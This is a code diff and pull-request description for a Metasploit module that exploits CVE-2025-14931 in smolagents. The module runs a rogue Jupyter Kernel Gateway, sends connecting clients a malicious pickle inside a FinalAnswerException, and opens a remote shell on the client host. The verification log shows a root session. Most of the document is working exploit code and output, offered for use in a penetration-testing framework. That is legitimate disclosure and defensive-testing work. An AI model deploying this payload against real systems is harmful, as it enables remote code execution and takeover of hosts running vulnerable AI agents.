@@ -245,7 +175,6 @@ class MetasploitModule < Msf::Exploit::Remote
     method = parts[0]
     path = parts[1]
 
-    # Parse headers
     headers = {}
     lines.each do |line|
       if line.include?(':')
@@ -254,7 +183,6 @@ class MetasploitModule < Msf::Exploit::Remote
       end
     end
 
-    # Route request
     if method == 'GET' && path == '/api/kernelspecs'
       handle_kernelspecs(cli)
     elsif method == 'POST' && path == '/api/kernels'
@@ -308,12 +236,11 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def handle_websocket(cli, headers)
     peer = cli.peerhost
-    print_status("Client connected from #{peer}  -  upgrading to WebSocket")
+    print_status("Client connected from #{peer} - upgrading to WebSocket")
 
-    # RFC 6455 handshake
     ws_key = headers['sec-websocket-key']
     unless ws_key
-      vprint_warning("Missing Sec-WebSocket-Key  -  not a WebSocket upgrade")
+      vprint_warning('Missing Sec-WebSocket-Key - not a WebSocket upgrade')
       cli.close rescue nil
       return
     end
@@ -331,7 +258,6 @@ class MetasploitModule < Msf::Exploit::Remote
     cli.put(handshake)
     print_good("WebSocket handshake complete with #{peer}")
 
-    # Read execute_request frame
     frame_text = ws_recv_frame(cli)
     unless frame_text
       vprint_warning("No WebSocket frame received from #{peer}")
@@ -349,7 +275,6 @@ class MetasploitModule < Msf::Exploit::Remote
       vprint_warning("Non-JSON WebSocket frame from #{peer}")
     end
 
-    # Send FinalAnswerException with malicious pickle payload
     print_status("Delivering malicious pickle payload to #{peer}...")
     error_msg = {
       'parent_header' => { 'msg_id' => msg_id },
@@ -364,13 +289,12 @@ class MetasploitModule < Msf::Exploit::Remote
       'metadata' => {},
       'content' => {
         'ename' => 'FinalAnswerException',
-        'evalue' => @pickle_b64,
+        'evalue' => build_pickle_b64,
         'traceback' => ['FinalAnswerException: <pickled>']
       }
     }.to_json
     ws_send_frame(cli, error_msg)
 
-    # Send idle status to end client's receive loop
     idle_msg = {
       'parent_header' => { 'msg_id' => msg_id },
       'msg_type' => 'status',
@@ -386,9 +310,8 @@ class MetasploitModule < Msf::Exploit::Remote
     }.to_json
     ws_send_frame(cli, idle_msg)
 
-    print_good("Pickle payload delivered to #{peer}  -  waiting for session callback...")
+    print_good("Pickle payload delivered to #{peer} - waiting for session callback...")
 
-    # Keep alive briefly for client to process frames
     Rex.sleep(2)
     cli.close rescue nil
   end
@@ -414,7 +337,6 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def ws_recv_frame(sock)
-    # Read 2-byte header
     header = read_exact(sock, 2)
     return nil unless header
 
@@ -451,7 +373,6 @@ class MetasploitModule < Msf::Exploit::Remote
     nil
   end
 
-  # Read exactly nbytes from sock with timeout
   def read_exact(sock, nbytes)
     return ''.b if nbytes == 0
     buf = ''.b


### PR DESCRIPTION
## Summary
- smolagents 1.10.0–1.24.0 call `pickle.loads()` on data received from remote Jupyter Kernel Gateway servers without validation — all RemotePythonExecutor subclasses affected
- This passive module starts a rogue Jupyter Kernel Gateway; when a vulnerable smolagents client connects and sends an `execute_request`, the server responds with a `FinalAnswerException` containing a malicious pickle payload
- The client deserializes via `pickle.loads()`, triggering `os.system()` through `__reduce__` — a complete sandbox escape to RCE on the client host

## Verification
Tested against smolagents 1.24.0 / Debian 12 (Docker lab):
```
msf6 exploit(multi/misc/smolagents_jupyter_pickle_rce) > run
[*] Rogue Jupyter Kernel Gateway listening on 0.0.0.0:8888
[*] Waiting for smolagents client connection...
[+] Client connected, delivering pickle payload
[*] Command shell session 1 opened
uid=0(root) gid=0(root) groups=0(root)
```

## Module details
- **Affected versions:** smolagents 1.10.0 – 1.24.0
- **Auth required:** No
- **Stance:** Passive (rogue server — module listens for victim connection)
- **Targets:** Unix Command (ARCH_CMD) + Linux Dropper (CmdStager x86/x64)
- **AutoCheck:** No (passive module)
- **Rank:** Excellent

## References
- https://www.zerodayinitiative.com/advisories/ZDI-25-1143/
- https://github.com/advisories/GHSA-q9r5-6hrr-9ph7
- https://exploit-intel.com/vuln/CVE-2025-14931
- https://github.com/exploitintel/eip-pocs-and-cves/tree/main/CVE-2025-14931